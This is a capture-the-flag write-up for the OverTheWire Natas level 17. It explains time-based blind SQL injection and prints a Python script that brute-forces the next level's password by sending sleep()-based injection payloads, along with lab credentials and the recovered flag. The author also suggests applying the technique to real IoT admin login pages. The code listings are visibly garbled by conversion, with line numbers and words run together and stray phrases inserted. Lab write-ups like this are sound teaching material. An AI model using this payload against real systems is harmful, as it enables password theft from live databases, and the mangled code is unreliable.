Natas wargame level writeup (time-based Blind SQL injection)

SourceCode Core Code:

1<?2 3 /*4 CREATE TABLE ' users ' (5 ' username ' varchar (+) DEFAULT NULL,6 ' password ' varchar (+) DEFAULT NULL7 );8 */9 Ten if(array_key_exists("username",$_request)) { One     $link=mysql_connect(' localhost ', ' natas17 ', ' <censored> '); A     mysql_select_db(' Natas17 ',$link); -      -     $query= "SELECT * from Users where username=\" ".$_request["username"]. " \""; the     if(array_key_exists("Debug",$_get)) { -         Echo"Executing query:$query<br> "; -     } -  +     $res=mysql_query($query,$link); -     if($res) { +     if(mysql_num_rows($res) > 0) { A//echo "This user exists.<br>"; at}Else { -         //echo "This user doesn ' t exist.<br>"; -     } -}Else { -         //echo "Error in query.<br>"; -     } in  -     Mysql_close($link); to}Else { +?> -  the<form action= "index.php" method= "POST" > *Username: <input name= "Username" ><br> $<input type= "Submit" value= "Check existence"/>Panax Notoginseng</form> -<? }?>

This question is similar to the previous one, which checks whether the username exists. However, this topic has commented out all the information returned, so we are unable to use the "return information" to make a blind note. Why do you want to quote it here? Please refer to Owasp's article: Https://www.owasp.org/index.php/Blind_SQL_Injection (really think Owasp's attack classification is very accurate, you must find a time to translate). It classifies the blinds, one is content-basedand the other is time-based. For pages that do not have a clear return query information (the page is still returned, but the page is empty), we can take the time based method to get the password for the blind. For example, we use the sleep () function and the IF statement in MySQL (https://dev.mysql.com/doc/refman/5.7/en/miscellaneous-functions.html#function_ Sleep, https://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html#function_if), as long as the results are queried to enter sleep (), delayed return , instead of immediately return, thereby indirectly get the information is correctly queried, thus slowly the password cracked out. In fact, I can think of this, I remember the algorithm class, the teacher said that the algorithm is bound to have a resource input, even if an empty statement such as pass, also need to enter the time. thus, as long as the resources are used, we can monitor the resources to guess the information (which is somewhat like a bypass attack).

Make changes to the previous blog post's script and add it to the time library.

1 ImportHttplib22  fromUrllib.parseImportUrlEncode3  fromTimeImport Time4 5h =Httplib2. Http ()6Natas17password ='8PS3H0GWBN5RD9S7GMADGQNDKHPKQ9CW'7H.add_credentials ('NATAS17', Natas17password)8BASESTR = List (Chr (i) forIinchRange (+) + list (Chr (i) forIinchRange (65, 91)) +List (9Chr (i) forIinchRange (97, 123))TenPassword ='XVKIQDJY4OPV7WCRGDLMJ0PFSCSDJHD' Oneindex =0 Aheaders = {'Content-type':'application/x-www-form-urlencoded'} -  while(Len (password) <Len (Natas17password)): -Forms =Dict ( theUsername="natas18\ "And if (password like binary""+ (password + basestr[index]) +"% ', sleep (5), 0);") -     Print(Forms) -Time_test =Time () -RESP, content = H.request ('http://natas17.natas.labs.overthewire.org/index.php','POST', UrlEncode (forms), headers) +Time_test = time ()-time_test -     Print(time_test) +     if(Time_test > 5): APassword + =Basestr[index] at         Print(password) -index =0 -         Continue -     Else: -Index = (index + 1)% (123-48) -         ifindex = =0: in             Print('wrong!') -         Continue to Print('Password =', password)

Note the following time, considering the network delay , I will sleep set to 5, redundancy is relatively large, from the output, generally immediately return the time of about 0.5 seconds.

Here's an idea for the previous blog post. In reality, we often notice that the information returned by the administrator is not minimized, such as "User name error", which allows us to do content-based injection (provided that the query statement can be injected). In fact, even if you set a "username or password error" can also inject attacks-because many times we are determined that the user name is correct (such as the Internet of things on the device's admin and default device user name, they are at most the password is set to different, but the default user name is mostly the same), You can also make a content blind note. Even if you do not log in or log in without returning information, we can also make a time blind by falsifying the difference in resource consumption .

Flag:XVKIQDJY4OPV7WCRGDLMJ0PFSCSDJHDP

Natas wargame level writeup (time-based Blind SQL injection)